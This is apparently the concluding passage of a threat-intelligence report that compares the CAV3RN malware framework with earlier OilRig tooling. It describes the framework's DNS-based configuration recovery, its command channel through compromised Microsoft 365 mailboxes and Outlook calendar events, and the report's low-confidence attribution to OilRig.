OilBooster used HTTP to recover a refresh token, whereas CAV3RN uses DNS AAAA records to recover four configuration fields. In both cases, the secondary mechanism restores access to the primary cloud C2 channel.
Compromised regional infrastructure
OilRig has previously used compromised infrastructure belonging to organizations in the regions it targets. Solar malware communicated through the compromised website of an Israeli human-resources company, while Whisper/Veaty malware used compromised Iraqi government Microsoft 365 mailboxes. The CAV3RN module similarly uses a compromised Microsoft 365 mailbox belonging to an Israeli law firm.
Based on the evidence discussed above, we retain our low-confidence assessment that Project CAV3RN is associated with OilRig. The new module shares several behavioral patterns with previously reported OilRig tooling, including the use of Microsoft-hosted services, attachment-based command exchange, and a secondary mechanism for restoring access to a cloud C2 channel. However, we identified no direct code reuse or infrastructure overlap.
Conclusions
The new module extends CAV3RN’s controller-and-plugin architecture with a Microsoft Graph-based communication transport. Its architectural continuity suggests that it was designed to replace the previous HTTP/WebSocket component with Outlook calendar events. If Graph authentication or validation fails, its DNS recovery protocol is designed to retrieve replacement connection settings.
The framework changed repeatedly between December 2025 and May 2026, indicating that development remains active. We continue to track this activity.